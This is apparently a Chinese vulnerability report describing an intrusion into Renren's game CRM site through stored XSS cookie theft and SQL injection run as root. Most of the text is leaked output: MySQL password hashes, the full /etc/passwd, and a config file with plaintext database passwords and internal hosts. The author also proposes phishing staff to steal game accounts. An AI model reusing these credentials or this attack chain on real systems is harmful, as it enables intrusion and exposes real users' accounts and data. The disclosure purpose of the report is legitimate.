XSS偷取cookies,还有注入,权限蛮大的哦,能直接load_file('/etc/passwd')
目测拿下wan.renren.com
http://wan.renren.com/service.shtml
首先这里随便找了一个客服,提交时插入XSS代码,似乎名字那里,忘记了,然后cookies就来了
然后进后台,高级管理员哦
爆路径 http://rrcrm.data.io8.org/lib/
/data/web/crm.imop.com/
必须验证cookies才能注入
Resp. Time(avg): 149 ms
Current User: root@localhost
Sql Version: 5.1.38-community-log
Current DB: CRM
System User: root@localhost
Host Name: TJHY248-160.opi.com
Installation dir: /
DB User & Pass: root:053a9bf72434f7f8:localhost
root:*84FC659A33D523EACAFFDD441B0D3FB5A114E791:TJHY248-160.opi.com
msgweb:32ce979f1810450d:%
gamesum:*04ED80791E1E83935FCFB04DB251B8923CA52276:10%
stat:532a371916879d65:%
gc_imop:*543E075F9BD62E4B2C39F12CD7BDDAA75A6E8A40:10.22.225.%
webcrm:63e483b832b5e91a:%
replication:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9:10.%
wangkun:27df606e7932e98c:%
zhenyu.shang:658d4f1d5d32391d:10.%
kettle:565491d704013245:%
Data Bases: information_schema
CRM
CRMUSER
binlogs
mysql
test
testcrm
tongyongcrm
user_classfy
下来找找passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
zabbix:x:500:500:Zabbix User:/home/zabbix:/bin/false
mysql:x:100:103:MySQL server:/var/lib/mysql:/bin/bash
然后是mysql等数据库配置
/data/web/crm.imop.com/config.inc.php
<?php
/**
* 设置数据库连接参数
*/
$cfg['sqlserv'] = 'localhost';
$cfg['sqluser'] = 'root';
$cfg['sqlpass'] = 'crm123li';
$cfg['sqllibr'] = 'CRM';
/**
* 页面TITLE
*/
$cfg['title'] = 'CRM管理系统2011';
/**
* 设置模板路径
*/
$cfg['template'] = 'templates';
$cfg['template_c'] = 'templates_c';
$color = array("black" , "blue" , "red" , "green" , "#999933" , "#4CD2D2" , "#FC9B39" , "#4B7994" , "#8300CA" , "#009C9C" , "#B24194" , "yellow" , "#11cccc" , "#77dd22" , "#444444", "#154544" , "#dd00CA" , "#cc9C9C" , "#aa4194" , "#bbcc33" , "#77aacc" , "#dd44dd" , "#211144" , "#98FF44","black" , "blue" , "red" , "green" , "#999933" , "#4CD2D2" , "#FC9B39" , "#4B7994" , "#8300CA" , "#009C9C" , "#B24194" , "yellow" , "#11cccc" , "#77dd22" , "#444444", "#154544" , "#dd00CA" , "#cc9C9C" , "#aa4194" , "#bbcc33" , "#77aacc" , "#dd44dd" , "#211144" , "#98FF44");
define('CRM_HOST','localhost:3306');
define('CRM_USER','root');
define('CRM_PWD','crm123li');
define('CRM_DB','CRM');
define('MARKET_ALL_HOST','sg.data.io8.org:3306');
define('MARKET_ALL_USER','stat');
define('MARKET_ALL_PWD','petnewstatZL123');
define('MARKET_ALL_DB','market_all');
//define("GAME_HOST","10.30.32.126:3306");
define("GAME_HOST","10.22.222.23");
define("GAME_USER","webcrm");
define("GAME_PWD","webcrm123");
define("GAME_DB","GAMEUSER");
define("GAMEPAY_DB","GAMEPAY");//后台算数
define("MGC_HOST","10.22.225.87:3306");
define("MGC_USER","webcrm");
define("MGC_PWD","webcrm123");
define("MGC_DB","GAMEUSER");
define("SSWEB_HOST","10.22.225.61:5003");
define("SSWEB_USER","webcrm");
define("SSWEB_PWD","webcrm123");
define("SSWEB_DB","ss_web");
//define("SSGC_HOST","10.22.225.22:4001");
//define("SSGC_USER","webcrm");
//define("SSGC_PWD","webcrm123");
//define("SSGC_DB","GAMEUSER");
define("SSGC_HOST","10.22.238.140:3306");
define("SSGC_USER","webcrm");
define("SSGC_PWD","webcrm123");
define("SSGC_DB","GAMEUSER");
define("SSCRM_HOST",'localhost:3306');
define("SSCRM_USER",'webcrm');
define("SSCRM_PWD",'webcrm123');
define("SSCRM_DB",'SSCRM');
//define("SHOP_HOST","10.22.225.34:3306");
define("SHOP_HOST","10.30.36.201");
define("SHOP_USER","webcrm");
define("SHOP_PWD","webcrm123");
define("SHOP_DB","mop_shop");
//校内中心
define("XIAONEI_HOST","10.22.225.115:3306");
define("XIAONEI_USER","webcrm");
define("XIAONEI_PWD",'webcrm123');
define("XIAONEI_DB","XNTSGAMELOCALPAY");
//算数DB
define("SUM_HOST","crmdb.data.io8.org");
define("SUM_USER","webcrm");
define("SUM_PWD",'webcrm123');
define("SUM_DB","CRMUSER");
//信息服务器db
define("MSG_HOST","10.30.32.95:3306");
define("MSG_USER","webcrm");
define("MSG_PWD",'webcrm123');
define("MSG_DB","IMOPMSG");
//分页设置
define("PAGE_MAX", 20);
define("PAGE_NUM", 10);
?>
好多
顺便发现个fck
http://cms-na.tech.io8.org/fckeditor/
http://rrcrm.data.io8.org/lib/FCKeditor/
另外,进后台后可以修改公告,没有任何过滤,如果我给弄个基础认证钓鱼的话,嘿嘿,也许还能搞到点游戏号
修复方案:
过滤XSS,然后限制管理员权限,加强 培训 啦
查看更多关于人人网游戏XSS+SQL注入+爆路径+列目录,员工信息的详细内容...